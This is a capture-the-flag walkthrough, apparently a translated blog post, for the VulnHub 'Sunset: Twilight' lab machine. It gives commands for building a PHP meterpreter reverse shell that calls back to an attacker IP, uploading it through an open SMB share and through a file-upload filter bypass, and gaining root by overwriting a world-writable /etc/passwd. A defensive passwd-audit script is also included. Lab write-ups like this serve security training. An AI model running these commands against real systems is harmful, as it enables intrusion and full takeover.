  • PJzhang: VulnHub target machine, sunset series, SUNSET: TWILIGHT

    猫宁~~~

    Address: https://www.vulnhub.com/entry/sunset-twilight,512/

    Focus on the tools and the approach.

    nmap 192.168.43.0/24
    Target machine IP
    192.168.43.164

    nmap -A -p1-65535 192.168.43.164

    22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    25/tcp open smtp Exim smtpd 4.92
    80/tcp open http Apache httpd 2.4.38 ((Debian))
    139/tcp open netbios-ssn netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp open microsoft-ds netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
    2121/tcp open ccproxy-ftp pyftpdlib 1.5.6
    3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
    8080/tcp open http-proxy PHP cli server 5.5 or later
    63525/tcp open http PHP cli server 5.5 or later

    enum4linux 192.168.43.164
    WRKSHARE Disk Workplace Share. Do not access if not an employee.

    smbclient //192.168.43.164/WRKSHARE, log in with no password
    smb: \>
    cd var\www\html
    smb: \var\www\html\>

    msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.154 LPORT=4444 -f raw >muma.php

    Upload muma.php over SMB
    smb: \var\www\html\> put muma.php

    msfconsole
    use exploit/multi/handler
    set payload php/meterpreter/reverse_tcp
    set lhost 192.168.43.154
    set lport 4444
    run

    Visit http://192.168.43.164/muma.php to get the reverse shell

    shell
    python -c "import pty;pty.spawn('/bin/bash')"
    www-data@twilight:/var/www/html$

    cd /home
    Shows that a user named miguel exists
    cat /etc/passwd
    miguel:x:1000:1000:,,,:/home/miguel:/bin/bash

    ls -al /etc/passwd shows read and write permission
    -rwxrwxrwx 1 root root 1594 Jul 16 09:34 /etc/passwd

    Run on the attacking machine
    openssl passwd -1 -salt useruser 123456

    Copy the target's /etc/passwd to the local machine
    Append as the last line
    useruser:$1$useruser$8MVi1CAiLopcN8yk6Hj4B0:0:0:/root/root:/bin/bash

    python3 -m http.server 80

    wget http://192.168.43.154/passwd -O /etc/passwd

    su useruser
    id
    uid=0(root) gid=0(root) groups=0(root)
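A defender-side check for the two conditions this escalation relied on, a writable /etc/passwd and a non-root UID 0 entry carrying its own password hash. This is an added example, not part of the original write-up; the function name, the `svc2` account and the sample lines are constructed for illustration.

```python
import stat

def audit_passwd(text, mode):
    """Return a list of findings for passwd file content and its st_mode."""
    findings = []
    # Anyone who can write the file can add or rewrite accounts.
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("file: writable by group/other (mode %o)" % stat.S_IMODE(mode))
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7:
            findings.append("line %d: %d fields, expected 7" % (n, len(f)))
        if len(f) < 3:
            continue
        name, pw, uid = f[0], f[1], f[2]
        # A second UID 0 account is root under another name.
        if uid == "0" and name != "root":
            findings.append("line %d: %s has UID 0" % (n, name))
        # 'x' defers to /etc/shadow; '*' and '!' lock the account.
        # Anything else is a hash (or an empty password) stored in passwd itself.
        if pw not in ("x", "*", "!", "!!"):
            kind = "empty password" if pw == "" else "inline password hash"
            findings.append("line %d: %s has %s" % (n, name, kind))
    return findings

# Constructed sample: two normal entries plus a placeholder rogue entry.
SAMPLE = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "miguel:x:1000:1000:,,,:/home/miguel:/bin/bash\n"
    "svc2:$1$SALT$PLACEHOLDERHASH:0:0::/root:/bin/bash\n"
)

if __name__ == "__main__":
    import os
    path = "/etc/passwd"
    with open(path) as fh:
        for finding in audit_passwd(fh.read(), os.stat(path).st_mode):
            print(finding)
```

On a healthy Debian host the file is mode 644 owned by root and the script prints nothing.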

    Getting a shell through the upload interface

    dirb http://192.168.43.3/

    http://192.168.43.3/gallery/

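    http://192.168.43.3/gallery/original/, where the directory listing can be browsed, for example the uploaded muma.php

    Rename muma.php to muma.php.pjpeg

    Upload it and intercept the request with Burp Suite,
    Content-Type: image/jpeg
    change the filename back to muma.php

    Upload succeeded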

    http://192.168.43.3/gallery/original/muma.php

    msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.154 LPORT=4444 -f raw >muma.php
    msfconsole
    use exploit/multi/handler
    set payload php/meterpreter/reverse_tcp
    set lhost 192.168.43.154
    set lport 4444
    run

    Shell obtained successfully

  • Original article: https://www.cnblogs.com/landesk/p/13688068.html